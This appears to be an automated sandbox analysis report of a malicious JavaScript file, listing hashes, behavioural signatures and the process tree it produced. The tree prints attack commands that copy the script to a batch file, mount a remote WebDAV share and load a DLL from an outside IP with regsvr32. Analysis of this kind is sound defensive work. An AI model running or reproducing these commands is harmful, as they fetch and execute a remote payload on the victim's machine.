Analysis
-
max time kernel
95s -
max time network
101s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09/07/2024, 08:55
Static task
static1
Behavioral task
behavioral1
Sample
17875271112736223481.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
17875271112736223481.js
Resource
win10v2004-20240704-en
General
-
Target
17875271112736223481.js
-
Size
5KB
-
MD5
3c92fccbeea4810a9b388189faabef3f
-
SHA1
1db68f8566b3d031eaadf62574f0de72ae23f237
-
SHA256
4374ba92c056eacdd6109b0c9ea1306bbcc6d53bb0e56ab5ee4b69f7cd7015be
-
SHA512
a488beb471bd539553d61197ef3a1b1cef5e5de20d58671941b687df3fd8780ad88471f67f3e31cdd17f57a0379a4fe67ff37eaa5975312a95da7402a5a197ea
-
SSDEEP
96:ad/Pe9SR0TWKDNssJR1RjxNssJR1RcpkJVIG/3hX8FQS37FgEk/T:aZPjnSssJv9ssJvGpuVI89U3RgEk/T
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3044 wrote to memory of 3952 3044 wscript.exe 82 PID 3044 wrote to memory of 3952 3044 wscript.exe 82 PID 3952 wrote to memory of 3712 3952 cmd.exe 86 PID 3952 wrote to memory of 3712 3952 cmd.exe 86 PID 3952 wrote to memory of 1436 3952 cmd.exe 87 PID 3952 wrote to memory of 1436 3952 cmd.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\17875271112736223481.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\17875271112736223481.js" "C:\Users\Admin\\bxcrdz.bat" && "C:\Users\Admin\\bxcrdz.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:3712
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\353.dll3⤵PID:1436
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD53c92fccbeea4810a9b388189faabef3f
SHA11db68f8566b3d031eaadf62574f0de72ae23f237
SHA2564374ba92c056eacdd6109b0c9ea1306bbcc6d53bb0e56ab5ee4b69f7cd7015be
SHA512a488beb471bd539553d61197ef3a1b1cef5e5de20d58671941b687df3fd8780ad88471f67f3e31cdd17f57a0379a4fe67ff37eaa5975312a95da7402a5a197ea